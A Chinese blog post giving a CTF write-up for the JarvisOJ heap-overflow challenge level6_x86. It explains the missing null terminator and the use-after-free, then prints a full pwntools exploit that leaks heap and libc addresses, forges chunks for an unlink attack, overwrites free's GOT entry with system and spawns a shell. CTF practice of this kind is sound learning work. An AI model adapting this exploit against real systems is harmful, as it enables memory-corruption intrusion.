(jarvisOJ)(pwn)level6_x86

最新推荐文章于 2022-03-13 11:03:24 发布
最新推荐文章于 2022-03-13 11:03:24 发布
阅读量430 收藏
点赞数
文章标签: 堆溢出 unlink
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43986365/article/details/98486681
版权

Unlink!Unlink!Unlink!

level6_x86作为一道堆溢出入门题,还是值得用来练练手,学习一下堆的基础的知识的。

参考文献:

ctf-wiki:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/unlink-zh/
大佬博客:https://blog.csdn.net/weixin_41617275/article/details/85270356

前言:

对于网上大多数大佬的思路都是改变本地的libc环境,然后手动查找libc地址,比如这位大佬传送门,但是鉴于我能力不够,不会这么高难度的工作,我还是老老实实泄露函数地址,用LibcSearcher工具泄露远程的libc版本再泄露基址算出偏移。

基本思路:

首先malloc4个堆块,先释放第一个和第三个,这样的话,这两个堆块会在unsortedbin中形成双向链表,由于题目中输入不加/x00,输出却要输出到/x00为止的特性漏洞,又因为程序free后没有把指针滞空,我们可以输出chunk0(第一个堆块)的bk也就是chunk2(第三个堆块)的地址,再加上系统固定的偏移,可以算出heap的基址,至于为什么要这个基址,建议看ctf-wiki,上面有网站地址。

做题步骤:

查看保护:
在这里插入图片描述
开了NX保护,栈段的保护,和我堆溢出有什么关系(雾)
进入IDA查看逻辑:
在这里插入图片描述

典型的菜单题,可以增删改查,非常适合作为溢出题。
我们直接说:增在输入时没加/x00,删没有把指针置空,改很正常,查要输出到/x00才结束,不然他不爽。
对于这些漏洞,我们利用一下,最主要的还是利用unlink的机制解题。
我这里有一点不同就是在泄露libc基址的时候没有在本地直接调出基址而是使用LibcSearcher工具进行泄露,对于新手来说还是比较友好的(毕竟不要改libc本地版本)
完整exp:

#!/usr/bin/env python
from pwn import *
from LibcSearcher import *
#context.log_level='debug'
p=remote('pwn2.jarvisoj.com',9885)
obj=LibcSearcher('free',0xf7607f30)
#p=process('./freenote_x86')
elf=ELF('./freenote_x86')
libc=ELF('./libc-2.19.so')
def List():
    p.recvuntil('Your choice: ')
    p.sendline('1')
def new(content):
    p.recvuntil('Your choice: ')
    p.sendline('2')
    p.recvuntil('Length of new note: ')
    p.sendline(str(len(content)))
    p.recvuntil('Enter your note:')
    p.send(content)
    p.recvuntil("Done.")
def edit(number,content):
    p.recvuntil('Your choice: ')
    p.sendline('3')
    p.recvuntil('Note number: ')
    p.sendline(str(number))
    p.recvuntil('Length of note: ')
    p.sendline(str(len(content)))
    p.recvuntil('Enter your note: ')
    p.send(content)
    p.recvuntil("Done.")
def delete(number):
    p.recvuntil('Your choice: ')
    p.sendline('4')
    p.recvuntil('Note number: ')
    p.sendline(str(number))
new('A'*7)
new('B'*7)
new('C'*7)
new('D'*7)
delete(0)
delete(2)
new('000')
List()
p.recv(7)
heap_base=u32(p.recv(4))-0xd28
chunk0=heap_base+0x18
delete(0)
delete(1)
delete(3)
payload=p32(0)+p32(0x80)+p32(heap_base+0x18-12)+p32(heap_base+0x18-8)
payload=payload.ljust(0x80,'\x00')
payload+=p32(0x80)+p32(0x80)
payload=payload.ljust(0x80*2,'\x00')
new(payload)
sleep(0.2)
delete(1)
payload1=p32(2)+p32(1)+p32(4)+p32(elf.got['free'])+p32(1)+p32(8)+p32(heap_base+0xca8)
payload1=payload1.ljust(0x80*2,'\x00')
edit(0,payload1)
List()
p.recvuntil('0. ')
free_addr=u32(p.recv(4))
print hex(free_addr)
offset=free_addr-obj.dump('free')
sys_addr=obj.dump('system')+offset
edit(0,p32(sys_addr))
edit(1,'/bin//sh')
delete(1)
p.interactive()
PLpa、
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
level6(Jarvis OJ)
weixin_43868725的博客
06-17 353
0x0 程序保护和流程 保护: 流程: main() init_note_pointer() 在note_pointer处存放note的信息,note_pointer[0]代表最多存放256个note,note_pointer[1]代表当前的note数量。 选择1会输出全部的note,选择2会新建一个note,结构为 { flag; //1代表正在使用,反之为0 length; //note的长度 note_pointer; //执行note的指针 } 选择3可以修改note的长度和内
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvis oj level6
发蝴蝶和大脑斧的博客
01-10 1159
原来的附件有点问题,重新发过了. 主要用了两个技术:1.溢出泄露libc地址,heap地址.2.unsafe_unlink,这个how2pwn上unsafe_unlink.c里写的很清楚. 首先看泄露libc地址 New("A"*0x80)#0 New("B"*0x80)#1 Delete(0) New("123") List() c=p.recvuntil('AAAA') leak_addr=u...
jarvisoj pwn level6 writeup
charlie_heng的专栏
01-21 1722
考完试了,又开始做题 这题是一道很好的用来熟悉的题 首先先确定漏洞的地方是delete note 漏洞有两个 1. 没有校验对应的是否有free 2. delete完之后没有把指向的指针清除 所以可以利用double free,触发unlink,达到任意内存修改的目的 具体怎么利用在https://www.cnblogs.com/0xJDchen/p/6195919.html
jarvisoj_level6_x64
z1r0的博客
03-13 667
jarvisoj_level6_x64 查看保护 这一类保护的题基本上就是申请到控制的地址,改got表 进ida直接奔delete这里去了,一枚uaf 第二个漏洞在这里edit可以申请size 攻击思路:这一题可以看到的size和是否释放都放在了一个地方,看了一下保护就可以知道大概的思路了。申请到管理的地方,然后填充入got表输出libc,改got为system。 注意:这里申请的是unstroted bin大小的块!!! 1.首先肯定是先要泄露libc,这一题可以使用unlink来解决,一
jarvisoj(level6)--unlink
九层台
09-21 1569
unlink其实就是把chunk从bin链中拉出来然后跟前面或者后面的chunk合并。 参考https://ctf-wiki.github.io/ctf-wiki/pwn/linux/heap/unlink/。 则当我们free(Q)时 glibc 判断这个块是 small chunk。 判断前向合并,发现前一个 chunk 处于使用状态,不需要前向合并。 判断后向合并,发现后一个 chunk ...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
jarvisoj)(pwn)guestbook2/level6_x64
PLpa的博客
08-28 1116
guestbook2和level6_x64真的是一摸一样的,两个题目除了提示文字不同,其他的漏洞根本一样,鉴于jarvisoj中的pwn服务器比pwn2服务器要稳定一点,所以这里就写guestbook2。 前言: 这里,我提供两种方法解题,一种是利用unlink的任意地址读写功能泄露libc基址,一种是用unsorted bin和use after free来泄露libc基址,两种方法都行。 漏洞...
jarvisoj_level6_x64(buuctf)--unlink利用
weixin_45427676的博客
04-14 587
这道题利用了unlink,unlink的利用原理我已经讲过了,以这个题来实列操作一下,加深对unlink利用的认识 查看保护机制 程序分析 在IDA查看一下主函数 可以看到程序中有四个功能函数,该程序是一个记事本程序,功能上基本就是添加记录、打印列出所有记录、编辑记录、删除记录。简单分析一下各函数的作用。 1、sub_400a49:创建记录索引表,具体就是分配一个大里面存了各条记录存储区...
jarvisoj pwn level系列
weixin_45551695的博客
05-26 191
某重新入坑的小白试图学会如何打pwn 从现在开始,个人计划也就开始了,希望能走下去吧, 先看看blibli这个基础的 CTF pwn 小白基础课 后面的UP主后面有,讲得浅显易懂 有基础有能力有时间的可以看看这个人 我不认识他但是货很干,很厉害,可以看看他的博客 然后 不多说,来搞事情 做题网站 level0 首先,下下来这个东东 拿到程序后先file可知为64位程序和动态链接 cheksec一下检查保护机制 我们能看到这个玩意,可以看到是一个只开启了NX的64位linux程序。 Stack:栈保护 R
jarvis guestbook2 / level6_x64
发蝴蝶和大脑斧的博客
03-12 842
level6思路相同,只是在x64运行。 遇到几个问题: 1.[DEBUG] Received 0x4e bytes: "*** Error in guestbook2: realloc(): invalid pointer: 0x0000000001dcb018 ***\n" 调试了半天发现是当新块的大小与原来不一致时都会调用realloc,所以要填充的时候要仔细。 2.原本想这样泄漏libc...
level6
m0_62094846的博客
02-10 206
经过判断,发现没过滤 < > " 但是有些关键词和' 不能用了,大致判断和第五题一样,换一个标签 "> <a href=javascript:alert('xss') > xss</a> // 也不行了,过滤了href onfocus,onblur,onkeydown,action也被过滤了 (on被过滤了) src也被过滤了 "><table background=javascript:alert(1...
hack this site--level6
qq_27181999的博客
06-12 754
这一次Sam对他的密码进行了加密,但是采用了公开加密的方法。 公开密钥加密的过程是: 假设两个用户A,B进行通信,A先发送信息给B,然后B发送信息给A 1.B先产生一对密钥K1a和k1b,前者用来加密,后者用来解密。 2.B把密钥K1a发送给A(因为K1a只能用来加密,截获方无法通过它来解密并读取密文) 3.A用密钥k1a加密一条信息,使之变成密文c1 4.A把密文c1发送给B 5.
jarvisoj pwn inst_prof writeup
charlie_heng的专栏
01-23 729
这题其实是google ctf的一道题 看到的时候完全震惊了。。。4字节shellcode。。。这要怎么弄啊 想了半天想不出,然后看了下别人的wp,又一次被震惊了,还有这种骚操作。。。 在执行shellcode的时候,r14这个寄存器是不变的,所以可以用r14这个寄存器来存一些重要的东西 然后就是怎么get到shell 呢? 我这里来一套别的骚操作,不用别的wp里面的rop 首先先来说
jarvisoj_freenote_x64
seaaseesa的博客
04-17 421
jarvisoj_freenote_x64 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,delete功能清空了标记但是,没有清空指针,使得可以多次free。 由于清空了标记,因此这个UAF只能用来double free。 用于输入的函数会输完a2个字符为止,会将里的指针覆盖掉,因此也无法直接泄露地址。 由此想到的方法就是构造overlap chunk,我们注意...
jarvis OJ basic (一) WP
weixin_30332241的博客
10-26 97
1.-.-字符串 观察发现是摩斯电码,直接摩斯电码转成字母 2.A Piece Of Cake 字母频率破解替换加密 解密网站:https://quipqiup.com/ especially ?ehavior which mimics humans or other animals. flag is su?stitutepassisveryeasyyougoti...
jarvisoj_level1
最新发布
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值